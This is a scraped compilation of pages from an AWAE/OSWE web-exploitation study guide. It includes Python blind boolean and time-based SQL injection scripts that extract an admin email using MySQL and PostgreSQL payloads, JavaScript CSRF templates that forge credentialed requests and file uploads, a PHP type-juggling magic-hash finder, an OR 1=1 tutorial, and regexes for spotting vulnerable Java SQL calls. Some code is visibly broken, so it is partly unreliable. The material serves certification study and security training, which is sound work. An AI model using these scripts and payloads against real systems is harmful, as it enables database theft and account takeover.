\[Deserialization\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization.md) - \[PHP\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/php.md) - \[Java\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java.md) - \[Ysoserial\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial.md) - \[SQL Injection\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection.md) - \[Type Juggling\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/type-juggling.md): Function to find a hash with some specific conditions. - \[CSRF\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf.md): Cross-Site Request Forgery (CSRF) - \[SQL Injection\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection.md) - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary.md): Injection of arbitrary SQL statements into a query. - \[Types\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types.md) - \[Injection by clause\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause.md): A list of payloads to propperly understand how the injection can be undertaken depending on the clause. - \[Bypassing Character Restrictions\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions.md) - \[By Language\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language.md) - \[JAVA\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java.md) - \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/regex.md) - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/summary.md) - \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/regex.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources.md) - \[Deserialization\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization.md) - \[By Language\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language.md) - \[PHP\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization.md) - \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/regex.md): Regex to find unserialize function followed by anything being passed a variable. - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/summary.md) - \[Practice\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/practice.md) - \[JAVA\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java.md) - \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/regex.md): Regex to match a set of functions/classes potentially vulnerable to deserialization. - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary.md) - \[Practice\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/practice.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources.md) - \[.NET\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net.md) - \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/regex.md) - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/summary.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/resources.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/resources.md) - \[XSS\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xss.md): Cross-Site Scripting (XSS) - \[XXE\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe.md) - \[By Language\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language.md) - \[PHP\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php.md) - \[Practice\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php/practice.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php/resources.md) - \[Java\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java.md) - \[Vulnerable Libraries' Implementation\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java/vulnerable-libraries-implementation.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/resources.md) - \[SSTI\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti.md) - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/summary.md) - \[Practice\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/practice.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/ssti/resources.md) - \[File Upload Restrictions Bypass\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass.md) - \[Tricks\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/tricks.md) - \[File Extension Filters Bypass List\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/resources.md) - \[REGEX\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/regex.md) - \[PHP\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php.md) - \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/regex.md): Compilation of PHP's regular expressions. - \[Type Juggling\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling.md) - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/summary.md): This vulnerability consists of a variable type conversion by the appearance of some essential factors. - \[Practice\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/php/type-juggling/practice.md): CTF challenges to practice Type Juggling. - \[Java\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java.md) - \[Decompiling\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/decompiling.md) - \[Compiling & Running\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/java/compiling-and-running.md) - \[NodeJS\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs.md) - \[Practice\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-language/nodejs/practice.md) - \[Random\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/random.md): Random tricks - \[Other Repositories\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/other-repositories.md): Other preparation repositories --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/master.md). # TL;DR This page does \*\*NOT\*\* pretend to replace \[AWAE/OSWE \](https://www.offensive-security.com/awae-oswe/)content, this is a compilation of the best (\*\*public|my own)\*\* \*\*resources\*\* I have come up with. \*\*AWAE LIST\*\*: \* \[Persistent Cross-Site Scripting\](/awae-oswe-preparation-resources/by-vulnerability/xss.md#stored) \* \[Session Hijacking\](/awae-oswe-preparation-resources/by-vulnerability/xss.md#session-hijaking) \* \[.NET Deserialization\](/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net.md) \* \[Data Exfiltration\](/awae-oswe-preparation-resources/by-vulnerability/xss.md#data-exfiltration) \* \[Bypassing File Extension Filters\](/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass/file-extension-filters-bypass.md) \* \[Magic Hashes\](/awae-oswe-preparation-resources/by-language/php/type-juggling.md) \* \[Bypassing REGEX restrictions\](/awae-oswe-preparation-resources/regex.md#filter-bypass) \* \[Cross-Site Request Forgery\](/awae-oswe-preparation-resources/general/pocs/csrf.md) \* \[Type Juggling \](/awae-oswe-preparation-resources/by-language/php/type-juggling.md) \* \[Blind SQL Injection\](/awae-oswe-preparation-resources/general/pocs/sql-injection.md#blind-time-based) \* \[Bypassing File Upload Restrictions\](/awae-oswe-preparation-resources/by-vulnerability/file-upload-restrictions-bypass.md) \* \[Loose Comparisons\](/awae-oswe-preparation-resources/by-language/php/type-juggling.md) \* \[Bypassing Character Restrictions\](/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions.md) \*\*PERSONAL LIST\*\*: \* Blind Time-Based & Boolean SQL Injection + Bypassing Character Restrictions \* MySQL \* PostgreSQL \* Deserialization \* PHP \* Java \* .NET \* XSS \* Reflected \* Stored \* Data Exfiltration \* Filter Bypass \* Loose Comparison \* Type Juggling \* Magic Hashes \* REGEX \* Filter Bypass \* File Upload Restrictions Bypass \* File Extension Filters Bypass Great people I have learnt a ton from:\\ \[@secgus\](https://twitter.com/secgus), \[@julianjm\](https://blog.julianjm.com/), \[@cynops\](https://twitter.com/cyn0ps), \[@devploit\](https://twitter.com/devploit), \[@oreos\](https://twitter.com/oreos\_es), \[@rmartinsanta\](https://twitter.com/rmartinsanta). Mentioned people:\\ \[@Takito\](https://twitter.com/takito1812), \[ITasahobby\](https://itasahobby.gitlab.io/). (\*\*CTF\*\*) Platforms I have enjoyed (and I'm enjoying) \*\*the most\*\*. {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/resources/whitebox.md). # WhiteBox {% embed url="" %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/type-juggling.md). # Type Juggling \`\`\`python def find\_hash(): x=1 while True: for combo in product("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", repeat=x): # Iterating over the charset with len(x) possible\_hash = hashlib.md5(f"{''.join(combo)}".encode("utf-8")).hexdigest() # Generating the hash if possible\_hash.startswith("0e") and possible\_hash\[2:\].isdigit(): # Checking for type juggling possibility. print(f"\[+\] {''.join(combo)} found with hash '{possible\_hash}'.") return f"{''.join(combo)}" else: x+=1 \`\`\` --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization.md). # Deserialization - \[PHP\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/php.md) - \[Java\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java.md) - \[Ysoserial\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial.md) --- # Summary | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary.md) . To exploit this kind of vulnerability, the query must be appended an `unsanitized (or not completely sanitized) user-controlled parameter.` For example, let's imagine this background: `($id being a user-supplied GET/POST parameter without previous sanitization)` Copy SELECT id, user, password FROM user_table WHERE id = '$id'; In an everyday situation, this query would consist of a different set of `numbers`. Copy SELECT id, user, password FROM user_table WHERE id = '1'; Copy SELECT id, user, password FROM user_table WHERE id = '999'; Copy SELECT id, user, password FROM user_table WHERE id = '56'; However, as the user controls the variable, a query can't also supply an intended id but `more characters` to make the query longer and `extract data`. Copy SELECT id, user, password FROM user_table WHERE id = '2' OR user = 'admin'; In this example, the injected query would return rows whose `id` equals `2` `OR` whose `user` equals `admin`. I can't think of an environment where this injections makes sense, but let's think about `this one`. Copy SELECT id, user, password FROM user_table WHERE user = '$supplied_user' AND password = '$supplied_password'; #### On the backend, there's a line checking whether the query returns `>0` rows. If it does, the login is `successful` because there's a user that fits our input.[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary#on-the-backend-theres-a-line-checking-whether-the-query-returns-greater-than-0-rows.-if-it-does-the) An query that would be returning the `intended` result: Copy SELECT id, user, password FROM user_table WHERE user = 'jorge' AND password = 'hunter2'; However, as seen before, user or password fields can contain `more characters`. Copy SELECT id, user, password FROM user_table WHERE user = 'jorge' AND password = 'hunter2' OR 1=1; Here's where the most common injection occurs. _The famous_ `OR 1=1`. Can you think of what's actually happening here? Well, the thing is that `the first query` would return `jorge's row` if a user with that user and password existed. `In the second one`, it will return `the entire database`, as **1 will always equal 1**, and an `OR operator` is being used. Copy SELECT id, user, password FROM user_table WHERE user = 'jorge' AND password = 'hunter2'; # Hey database, give me the id, user and password from the table 'user_table' whose user equals 'jorge' and password 'hunter2'. # + Ooookay, Im afraid there's no user with such information! My bad. # No probs, good job on that. SELECT id, user, password FROM user_table WHERE user = 'jorge' AND password = 'hunter2' OR 1=1; # Hey database, give me the id, user and password from the table 'user_table' whose user equals 'jorge' and password 'hunter2'. # + Ooookay, Im afraid there's no user with such information! My bad. # No probs, shall I add one more requirement? # + Yeah, alright. # Thanks, so here it is. Give me the id, user and password from the table 'user_table' when 1=1. # + Hmm okay, 1 equals 1 so here you have! (700 rows). This is not the only occasion where an injection might be successful. As **SQL** has lots of methods, this injections can be **(non)stacked**, and in `clauses` such as `INSERT, UPDATE, SELECT, WHERE, ORDER BY, etc.` #### Stacked queries[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary#stacked-queries) This queries allow using `;`, so more than one query can be executed. [PreviousSQL Injection](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection) [NextTypes](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types) Last updated 6 years ago --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/csrf.md). # CSRF ## Request \`\`\`javascript function req(method, url, body=null) { request = new XMLHttpRequest(); request.open(method, url); if (method.localeCompare("POST") === 0) { request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); } request.send(body); for(; request.readyState !== XMLHttpRequest.DONE;) return request; } function trigger\_change(needed\_value) { req("METHOD", "/ENDPOINT", "DATA (IF POST REQUEST)"); } trigger\_change("VALUE"); \`\`\` ## File Upload \`\`\`javascript var targetLocation= "/ENDPOINT"; function byteValue(x) { return x.charCodeAt(0) & 0xff; } function toBytes(datastr) { var ords = Array.prototype.map.call(datastr, byteValue); var ui8a = new Uint8Array(ords); return ui8a.buffer; } if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) { this.send(toBytes(datastr)); } } function fileUpload(fileData, fileName) { var fileSize = fileData.length, boundary = "--------------------------------1337", // MAX 70 chars. uri = targetLocation, xhr = new XMLHttpRequest(); var additionalFields = { } var fileFieldName = "fieldName"; xhr.open("POST", uri, true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*;q=0.8") xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request. xhr.setRequestHeader("Content-Length", fileSize); xhr.withCredentials = "true"; xhr.onreadystatechange = function() { console.log(xhr.responseText); } var body = ""; for (var i in additionalFields) { if (additionalFields.hasOwnProperty(i)) { body += addField(i, additionalFields\[i\], boundary); } } body += addFileField(fileFieldName, fileData, fileName, boundary); body += "--" + boundary + "--"; xhr.sendAsBinary(body); return true; } function addField(name, value, boundary) { var c = "--" + boundary + "\\r\\n" c += "Content-Disposition: form-data; name='" + name + "'\\r\\n\\r\\n"; c += value + "\\r\\n"; return c; } function addFileField(name, value, filename, boundary) { var c = "--" + boundary + "\\r\\n" c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\\r\\n"; c += "Content-Type: application/x-compressed\\r\\n\\r\\n"; c += value + "\\r\\n"; return c; } var start = function() { var c = "HEX-FILE-DATA" fileUpload(c, "FILE-NAME"); }; start(); \`\`\` ## Form Submit \`\`\`markup \`\`\` --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection.md). # SQL Injection - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary.md): Injection of arbitrary SQL statements into a query. - \[Types\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types.md) - \[Injection by clause\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause.md): A list of payloads to propperly understand how the injection can be undertaken depending on the clause. - \[Bypassing Character Restrictions\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions.md) - \[By Language\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language.md) - \[JAVA\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java.md) - \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/regex.md) - \[Summary\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/summary.md) - \[Regex\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/regex.md) - \[Resources\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources.md) --- # Regex | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/regex.md) . Copy (executeQuery|java.sql.Statement.execute|java.sql.Statement.executeQuery|java.sql.Connection.createStatement) [PreviousJAVA](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java) [NextSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/summary) Last updated 6 years ago --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/deserialization/java.md). # Java ## \[Ysoserial Payload Building\](/awae-oswe-preparation-resources/general/pocs/deserialization/java/ysoserial.md) ## Serialize/Deserialize Java Example ### Binary \`\`\`java import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.io.Serializable; public class POC implements Serializable { private String data; public POC(String testData) { data = testData; } public String getData() { return data; } public static void Serialize() { try { // Object Creation POC poctest = new POC("a"); // Creating output stream and writing the serialized object FileOutputStream outfile = new FileOutputStream("serialized.object"); ObjectOutputStream outstream = new ObjectOutputStream(outfile); outstream.writeObject(poctest); outstream.flush(); // closing the stream outstream.close(); System.out.println("Serialized object saved to serialized.object"); } catch (Exception e) { System.out.println(e); }} public static void Deserialize() { try{ ObjectInputStream in = new ObjectInputStream(new FileInputStream("serialized.object")); POC poctest = (POC)in.readObject(); // Printing the data of the serialized object System.out.println("Object's data: " + poctest.data); // Closing the stream in.close(); }catch(Exception e){ System.out.println(e); } } public static void main(String args\[\]) { POC.Serialize(); // POC.Deserialize(); } } \`\`\` ### XML {% embed url="" %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/general/pocs/sql-injection.md). # SQL Injection ## Boolean \`\`\`python import requests import sys #import urllib3 #urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning) def test\_injection(url, condition): req = requests.get(url)#, verify=False) if condition in req.text: # Check whether the condition has occurred. If so, the injection has been successful. return True else: return False def extract(target, injection, query, condition): pos = 1 extracted = "" while True: for ascii\_char in range(32, 126): # Iterate over the ascii range of characters. if test\_injection(target + injection.format(query, pos, ascii\_char).replace(" ","/\*\*/"), condition): extracted += chr(ascii\_char) pos += 1 break else: return extracted def get\_admin\_email(target, injection, condition): query = "SELECT email FROM users WHERE username = 'admin'" return extract(target, injection, query, condition) def main(): if len(sys.argv) != 4: print("\[+\] Usage: {} TARGET LHOST LPORT".format(sys.argv\[0\])) sys.exit(-1) target = sys.argv\[1\] lhost = sys.argv\[2\] lport = sys.argv\[3\] ## MySQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1)){}%23" # Declare the injection string. ## PostgreSQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string. extracted\_data = get\_admin\_email(target, injection, "CONDITION") print("\[+\] EXTRACTED: {}".format(extracted\_data) if \_\_name\_\_ == "\_\_main\_\_": main() \`\`\` ## Blind Time-Based \`\`\`python import requests import sys #import urllib3 #urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning) def test\_injection(url, time\_condition): req = requests.get(url)#, verify=False) if req.elapsed.total\_seconds() > int(time\_condition): # Check whether the condition has occurred. If so, the injection has been successful. return True else: return False def extract(target, injection, query, time\_condition): pos = 1 extracted = "" while True: for ascii\_char in range(32, 126): # Iterate over the ascii range of characters. if test\_injection(target + injection.format(query, pos, ascii\_char).replace(" ","/\*\*/"), time\_condition): extracted += chr(ascii\_char) pos += 1 break else: return extracted def get\_admin\_email(target, injection, time\_condition): query = "SELECT email FROM users WHERE username = 'admin'" return extract(target, injection, query, time\_condition) def main(): if len(sys.argv) != 4: print("\[+\] Usage: {} TARGET LHOST LPORT".format(sys.argv\[0\])) sys.exit(-1) target = sys.argv\[1\] lhost = sys.argv\[2\] lport = sys.argv\[3\] ## MySQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND SLEEP(5)%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1)){} AND BENCHMARK(3000000,SHA1(1337))%23" # Declare the injection string. # average 2-3 seconds ## PostgreSQL # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT 1 FROM pg\_sleep(10))=1%23" # Declare the injection string. # injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT COUNT(\*) FROM GENERATE\_SERIES(1,\[SLEEPTIME\]000000))=1%23" # Declare the injection string. extracted\_data = get\_admin\_email(target, injection, NUMBER\_OF\_SECONDS\_TO\_DETECT) print("\[+\] EXTRACTED: {}".format(extracted\_data)) if \_\_name\_\_ == "\_\_main\_\_": main() \`\`\` --- # Summary | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/summary.md) . The following libraries are mostly used to append raw variables to their methods: * java.sql.Statement.execute * java.sql.Statement.executeQuery (executeQuery) * java.sql.Connection.createStatement [PreviousRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/regex) [NextRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/regex) Last updated 6 years ago --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary.md). # Summary To exploit this kind of vulnerability, the query must be appended an \`unsanitized (or not completely sanitized) user-controlled parameter.\` For example, let's imagine this background: \`($id being a user-supplied GET/POST parameter without previous sanitization)\` \`\`\`sql SELECT id, user, password FROM user\_table WHERE id = '$id'; \`\`\` In an everyday situation, this query would consist of a different set of \`numbers\`. \`\`\`sql SELECT id, user, password FROM user\_table WHERE id = '1'; \`\`\` \`\`\`sql SELECT id, user, password FROM user\_table WHERE id = '999'; \`\`\` \`\`\`sql SELECT id, user, password FROM user\_table WHERE id = '56'; \`\`\` However, as the user controls the variable, a query can't also supply an intended id but \`more characters\` to make the query longer and \`extract data\`. \`\`\`sql SELECT id, user, password FROM user\_table WHERE id = '2' OR user = 'admin'; \`\`\` In this example, the injected query would return rows whose \`id\` equals \`2\` \`OR\` whose \`user\` equals \`admin\`. I can't think of an environment where this injections makes sense, but let's think about \`this one\`. \`\`\`sql SELECT id, user, password FROM user\_table WHERE user = '$supplied\_user' AND password = '$supplied\_password'; \`\`\` #### On the backend, there's a line checking whether the query returns \`>0\` rows. If it does, the login is \`successful\` because there's a user that fits our input. An query that would be returning the \`intended\` result: \`\`\`sql SELECT id, user, password FROM user\_table WHERE user = 'jorge' AND password = 'hunter2'; \`\`\` However, as seen before, user or password fields can contain \`more characters\`. \`\`\`sql SELECT id, user, password FROM user\_table WHERE user = 'jorge' AND password = 'hunter2' OR 1=1; \`\`\` Here's where the most common injection occurs. \*The famous\* \`OR 1=1\`. Can you think of what's actually happening here? Well, the thing is that \`the first query\` would return \`jorge's row\` if a user with that user and password existed. \`In the second one\`, it will return \`the entire database\`, as \*\*1 will always equal 1\*\*, and an \`OR operator\` is being used. \`\`\`sql SELECT id, user, password FROM user\_table WHERE user = 'jorge' AND password = 'hunter2'; # Hey database, give me the id, user and password from the table 'user\_table' whose user equals 'jorge' and password 'hunter2'. # + Ooookay, Im afraid there's no user with such information! My bad. # No probs, good job on that. SELECT id, user, password FROM user\_table WHERE user = 'jorge' AND password = 'hunter2' OR 1=1; # Hey database, give me the id, user and password from the table 'user\_table' whose user equals 'jorge' and password 'hunter2'. # + Ooookay, Im afraid there's no user with such information! My bad. # No probs, shall I add one more requirement? # + Yeah, alright. # Thanks, so here it is. Give me the id, user and password from the table 'user\_table' when 1=1. # + Hmm okay, 1 equals 1 so here you have! (700 rows). \`\`\` This is not the only occasion where an injection might be successful. As \*\*SQL\*\* has lots of methods, this injections can be \*\*(non)stacked\*\*, and in \`clauses\` such as \`INSERT, UPDATE, SELECT, WHERE, ORDER BY, etc.\` #### Stacked queries This queries allow using \`;\`, so more than one query can be executed. --- # By Language | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language.md) . [JAVA](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java) [PreviousBypassing Character Restrictions](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions) [NextJAVA](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java) Last updated 6 years ago --- # Regex | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/regex.md) . Copy = *[\.\+]*.*['"][%s]*.*(SELECT|UPDATE|INSERT|DELETE|WHERE|ORDER).*[%s]*['"] *[\.\+]  https://regex101.com/ Copy = *[\.\+]*.*['"][%s]*.*(SELECT|UPDATE|INSERT|DELETE|WHERE|ORDER).*[%s]*['"] *[\.\+] = matches the character = literally (case sensitive) * matches the character (space) literally (case sensitive) * Quantifier — Matches between zero and unlimited times, as many times as possible, giving back as needed (greedy) Match a single character present in the list [\.\+]* * Quantifier — Matches between zero and unlimited times, as 